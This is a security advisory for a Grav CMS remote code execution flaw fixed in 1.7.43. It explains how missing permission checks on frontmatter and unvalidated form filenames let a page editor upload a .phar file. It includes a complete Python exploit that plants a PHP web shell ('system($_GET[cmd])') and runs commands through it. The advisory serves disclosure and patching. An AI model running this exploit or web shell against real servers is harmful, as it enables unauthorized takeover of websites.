GHSA-f6g2-h7qv-3m5v

Suggest an improvement
Source
https://github.com/advisories/GHSA-f6g2-h7qv-3m5v
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-f6g2-h7qv-3m5v
Aliases
Published
2024-03-06T16:58:33Z
Modified
2024-12-04T05:29:24.832961Z
Summary
Remote Code Execution by uploading a phar file using frontmatter
Details

Summary

  • Due to insufficient permission verification, user who can write a page use frontmatter feature.
  • Inadequate File Name Validation

Details

  1. Insufficient Permission Verification

In Grav CMS, "Frontmatter" refers to the metadata block located at the top of a Markdown file. Frontmatter serves the purpose of providing additional information about a specific page or post. In this feature, only administrators are granted access, while regular users who can create pages are not. However, if a regular user adds the data[_json][header][form] parameter to the POST Body while creating a page, they can use Frontmatter. The demonstration of this vulnerability is provided in video format. Video Link

  1. Inadequate File Name Validation

To create a Contact Form, Frontmatter and markdown can be written as follows: Contact Form Example Form Action Save Option When an external user submits the Contact Form after filling it out, the data is stored in the user/data folder. The filename under which the data is stored corresponds to the value specified in the filename attribute of the process property. For instance, if the filename attribute has a value of "feedback.txt," a feedback.txt file is created in the user/data/contact folder. This file contains the value entered by the user in the "name" field. The problem with this functionality is the lack of validation for the filename attribute, potentially allowing the creation of files such as phar files on the server. An attacker could input arbitrary PHP code into the "name" field to be saved on the server. However, Grav filter the < and > characters, so to disable these options, an xss_check: false attribute should be added. Disable XSS

---
title: Contact Form

form:
    name: contact
    xss_check: false

    fields:
        name:
          label: Name
          placeholder: Enter your name
          autocomplete: on
          type: text
          validate:
            required: true

    buttons:
        submit:
          type: submit
          value: Submit

    process:
        save:
            filename: this_is_file_name.phar
            operation: add

---

# Contact form

Some sample page content

Exploiting these two vulnerabilities allows the following scenario:

  • A regular user account capable of creating pages is required.
  • An attacker creates a Contact Form page containing malicious Frontmatter using the regular user's account.
  • Accessing the Contact Form page, the attacker submits PHP code.
  • The attacker attempts Remote Code Execution by accessing HOST/user/data/[form-name]/[filename].

PoC

PoC Video Link

# PoC.py
import requests
from bs4 import BeautifulSoup

class Poc:

    def __init__(self, cmd):
        self.sess = requests.Session()

        ##########    INIT    ################
        self.USERNAME = "guest"
        self.PASSWORD = "Guest123!"
        self.PREFIX_URL = "http://192.168.12.119:8888/grav"
        self.PAGE_NAME = "this_is_poc_page47"
        self.PHP_FILE_NAME = "universe.phar"
        self.PAYLOAD = '<?php system($_GET["cmd"]); ?>'
        self.cmd = cmd
        ##########    END    ################

        self.sess.get(self.PREFIX_URL)
        self._login()
        self._save_page()
        self._inject_command()
        self._execute_command()


    def _get_nonce(self, data, name):
        # Get login nonce value
        res = BeautifulSoup(data, "html.parser")
        return res.find("input", {"name" : name}).get("value")


    def _login(self):
        print("[*] Try to Login")
        res = self.sess.get(self.PREFIX_URL + "/admin")

        login_nonce = self._get_nonce(res.text, "login-nonce")

        # Login
        login_data = {
            "data[username]" : self.USERNAME,
            "data[password]" : self.PASSWORD,
            "task" : "login",
            "login-nonce" : login_nonce
        }
        res = self.sess.post(self.PREFIX_URL + "/admin", data=login_data)

        # Check login
        if res.status_code != 303:
            print("[!] username or password is wrong")
            exit()

        print("[*] Success Login")


    def _save_page(self):
        print("[*] Try to write page")

        res = self.sess.get(self.PREFIX_URL + f"/admin/pages/{self.PAGE_NAME}/:add")
        form_nonce = self._get_nonce(res.text, "form-nonce")
        unique_form_id = self._get_nonce(res.text, "__unique_form_id__")

        # Add page data
        page_data  = f"task=save&data%5Bheader%5D%5Btitle%5D={self.PAGE_NAME}&data%5Bcontent%5D=content&data%5Bheader%5D%5Bsearch%5D=&data%5Bfolder%5D={self.PAGE_NAME}&data%5Broute%5D=&data%5Bname%5D=form&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&toggleable_data%5Bheader%5D%5Bprocess%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Bredirect_default_route%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0"
        page_data += f"&data%5B_json%5D%5Bheader%5D%5Bform%5D=%7B%22xss_check%22%3Afalse%2C%22name%22%3A%22contact-form%22%2C%22fields%22%3A%7B%22name%22%3A%7B%22label%22%3A%22Name%22%2C%22placeholder%22%3A%22Enter+php+code%22%2C%22autofocus%22%3A%22on%22%2C%22autocomplete%22%3A%22on%22%2C%22type%22%3A%22text%22%2C%22validate%22%3A%7B%22required%22%3Atrue%7D%7D%7D%2C%22process%22%3A%7B%22save%22%3A%7B%22filename%22%3A%22{self.PHP_FILE_NAME}%22%2C%22operation%22%3A%22add%22%7D%7D%2C%22buttons%22%3A%7B%22submit%22%3A%7B%22type%22%3A%22submit%22%2C%22value%22%3A%22Submit%22%7D%7D%7D"
        res = self.sess.post(self.PREFIX_URL + f"/admin/pages/{self.PAGE_NAME}/:add" , data = page_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})

        print("[*] Success write page: " + self.PREFIX_URL + f"/{self.PAGE_NAME}")


    def _inject_command(self):
        print("[*] Try to inject php code")

        res = self.sess.get(self.PREFIX_URL + f"/{self.PAGE_NAME}")
        form_nonce = self._get_nonce(res.text, "form-nonce")
        unique_form_id = self._get_nonce(res.text, "__unique_form_id__")

        form_data = f"data%5Bname%5D={self.PAYLOAD}&__form-name__=contact-form&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}"

        res = self.sess.post(self.PREFIX_URL + f"/{self.PAGE_NAME}" , data = form_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})

        print("[*] Success inject php code")


    def _execute_command(self):
        res = self.sess.get(self.PREFIX_URL + f"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}")

        if res.status_code == 404:
            print("[!] Fail to execute command or not save php file.")
            exit()

        print("[*] This is uploaded php file url.")
        print(self.PREFIX_URL + f"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}")
        print(res.text)


if __name__ == "__main__":
    Poc(cmd="id")

Impact

Remote Code Execution

Database specific
{
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-287",
        "CWE-434"
    ],
    "severity": "CRITICAL",
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-06T16:58:33Z"
}
References

Affected packages

Packagist / getgrav/grav

Package

Name
getgrav/grav
Purl
pkg:composer/getgrav/grav

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
1.7.43

Affected versions

0.*

0.8.0
0.9.0
0.9.1
0.9.2
0.9.3
0.9.4
0.9.5
0.9.6
0.9.7
0.9.8
0.9.9
0.9.10
0.9.11
0.9.12
0.9.13
0.9.14
0.9.15
0.9.16
0.9.17
0.9.18
0.9.19
0.9.20
0.9.21
0.9.22
0.9.23
0.9.24
0.9.25
0.9.26
0.9.27
0.9.28
0.9.29
0.9.30
0.9.31
0.9.32
0.9.33
0.9.34
0.9.35
0.9.36
0.9.37
0.9.38
0.9.39
0.9.40
0.9.41
0.9.42
0.9.43
0.9.44
0.9.45

1.*

1.0.0-rc.1
1.0.0-rc.2
1.0.0-rc.3
1.0.0-rc.4
1.0.0-rc.5
1.0.0-rc.6
1.0.0
1.0.1
1.0.2
1.0.3
1.0.4
1.0.5
1.0.6
1.0.7
1.0.8
1.0.9
1.0.10
1.1.0-beta.1
1.1.0-beta.2
1.1.0-beta.3
1.1.0-beta.4
1.1.0-beta.5
1.1.0-rc.1
1.1.0-rc.2
1.1.0-rc.3
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.1.5
1.1.6
1.1.7
1.1.8
1.1.9-rc.1
1.1.9-rc.2
1.1.9-rc.3
1.1.9
1.1.10
1.1.11
1.1.12
1.1.13
1.1.14
1.1.15
1.1.16
1.1.17
1.2.0-rc.1
1.2.0-rc.2
1.2.0-rc.3
1.2.0
1.2.1
1.2.2
1.2.3
1.2.4
1.3.0-rc.1
1.3.0-rc.2
1.3.0-rc.3
1.3.0-rc.4
1.3.0-rc.5
1.3.0
1.3.1
1.3.2
1.3.3
1.3.4
1.3.5
1.3.6
1.3.7
1.3.8
1.3.9
1.3.10
1.4.0-beta.1
1.4.0-beta.2
1.4.0-beta.3
1.4.0-rc.1
1.4.0-rc.2
1.4.0
1.4.1
1.4.2
1.4.3
1.4.4
1.4.5
1.4.6
1.4.7
1.4.8
1.5.0-beta.1
1.5.0-beta.2
1.5.0-rc.1
1.5.0
1.5.1
1.5.2
1.5.3
1.5.4
1.5.5
1.5.6
1.5.7
1.5.8
1.5.9
1.5.10
1.6.0-beta.1
1.6.0-beta.2
1.6.0-beta.3
1.6.0-beta.4
1.6.0-beta.5
1.6.0-beta.6
1.6.0-beta.7
1.6.0-beta.8
1.6.0-rc.1
1.6.0-rc.2
1.6.0-rc.3
1.6.0-rc.4
1.6.0
1.6.1
1.6.2
1.6.3
1.6.4
1.6.5
1.6.6
1.6.7
1.6.8
1.6.9
1.6.10
1.6.11
1.6.12
1.6.13
1.6.14
1.6.15
1.6.16
1.6.17
1.6.18
1.6.19
1.6.20
1.6.21
1.6.22
1.6.23
1.6.24
1.6.25
1.6.26
1.6.27
1.6.28
1.6.29
1.6.30
1.6.31
1.7.0-beta.1
1.7.0-beta.2
1.7.0-beta.3
1.7.0-beta.4
1.7.0-beta.5
1.7.0-beta.6
1.7.0-beta.7
1.7.0-beta.8
1.7.0-beta.9
1.7.0-beta.10
1.7.0-rc.1
1.7.0-rc.2
1.7.0-rc.3
1.7.0-rc.4
1.7.0-rc.5
1.7.0-rc.6
1.7.0-rc.7
1.7.0-rc.8
1.7.0-rc.9
1.7.0-rc.10
1.7.0-rc.11
1.7.0-rc.12
1.7.0-rc.13
1.7.0-rc.14
1.7.0-rc.15
1.7.0-rc.16
1.7.0-rc.17
1.7.0-rc.18
1.7.0-rc.19
1.7.0-rc.20
1.7.0
1.7.1
1.7.3
1.7.4
1.7.5
1.7.6
1.7.7
1.7.8
1.7.9
1.7.10
1.7.12
1.7.13
1.7.14
1.7.15
1.7.16
1.7.17
1.7.18
1.7.19
1.7.20
1.7.21
1.7.22
1.7.23
1.7.24
1.7.25
1.7.26
1.7.26.1
1.7.27
1.7.27.1
1.7.28
1.7.29
1.7.29.1
1.7.30
1.7.31
1.7.32
1.7.33
1.7.34
1.7.35
1.7.36
1.7.37
1.7.37.1
1.7.38
1.7.39
1.7.39.1
1.7.39.2
1.7.39.3
1.7.39.4
1.7.40
1.7.41
1.7.41.1
1.7.41.2
1.7.42
1.7.42.1
1.7.42.2
1.7.42.3